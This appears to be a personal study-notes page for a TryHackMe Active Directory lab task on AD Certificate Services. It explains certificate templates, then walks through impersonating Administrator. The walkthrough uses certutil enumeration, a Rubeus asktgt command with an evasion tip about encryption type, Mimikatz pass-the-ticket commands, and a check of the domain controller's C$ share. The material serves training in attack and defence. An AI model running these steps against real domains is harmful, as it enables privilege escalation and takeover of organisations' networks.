Exploiting Certificates
Resources
Task 8 of TryHackMe Exploiting AD room
Certificate template concepts
Manage certificate templates
[MS-CRTD] Certificate Templates Structure
Certutil
PSPKIAudit
AD CS auditing
Further readings on AD Certificate exploitation (as a result of misconfigurations)
What is AD Certificate Services?
A Microsoft's Public Key Infrastructure (PKI) implementation. It leverages on the fact that Active Directory (AD) provides a level of trust in an organisation, which allows it be act as a Certificate Authority (a PKI that issues certificates) to prove and delegate trust.
Certificate templates
Certificate templates can greatly simplify the task of administering an Active Directory Certificate Services (AD CS) certification authority (CA) by allowing an administrator to issue certificates preconfigured for selected tasks.
Certificate templates are the sets of rules and settings that are configured on a CA to be applied against incoming certificate requests. Certificate templates also give instructions to the client on how to create and submit a valid certificate request.
Exploitation example
View the configured templates
C:\>certutil -Template -v > templates.txtThis command allows us to view all the configured certificate templates. The following tool can be used too
A combination of certain certificate parameter values (misconfiguration) may allow us to exploit the certificate to perform privilege escalation
refer to the linked titled: "Further readings on AD Certificate exploitation (as a result of misconfigurations)" under the resources section above for more information
Request for a TGT using the newly retrieved certificate (to impersonate a particular user, eg. Administrator)
Given that we are able to retrieve a certificate with configured parameters of our choice: User Principal Name (UPN), etc., we can now use the certificate to request for a TGT to impersonate a user with rubeus.exe:
Note: we can retrieve the certificate using the Microsoft Management Console (MMC))
The following attack works due to the permissions provided by the certificate template. Particularly in this example, the ability to specify the Subject Alternative Name (SAN), and to be able to use the certificate for client authentication
rubeus.exe asktgt /user:<user> /enctype:aes256 /certificate:<path_to_certificate> /password:<certificate_file_password> /outfile:<output_filename> /domain:<domain> /dc:<IP_of_DC>/user: Username to impersonate. This value has to match the UPN specified in the certificate/enctype: This specifies the encryption type for the ticket.Setting a value for this field is important for evasion, since the default encryption algorithm is weak, which may result in an overpass-the-hash alert
/certificate: Path to the certificate was generated previously/password: Password for the certificate file/outfile:The file to output the TGT to/domain: The FQDN of the domain we are attacking/dc:The IP of the domain controller which we are requesting the TGT fromIt is best to select a DC that has a CA service running
Next, we can load the TGT into memory with mimikatz:
mimikatz # privilege::debug
mimikatz # kerberos::ptt <TGT_file_location>.kirbi
mimikatz # exitTest the validity of our TGT against the target
Given that we have crafted a TGT for the Administrator on the DC named DC.TEST.COM, we can now attempt to view the directory listing on that machine:
C:\> dir \\DC.TEST.COM\C$We can confirm that our TGT is working if we are able to view the directory listing.
Note
This attack variant works due to certain parameter value misconfigurations provided by the certificate template. Checkout the linked titled: "Further readings on AD Certificate exploitation (as a result of misconfigurations)" under the resources section above for more information on different attack variants.
Last updated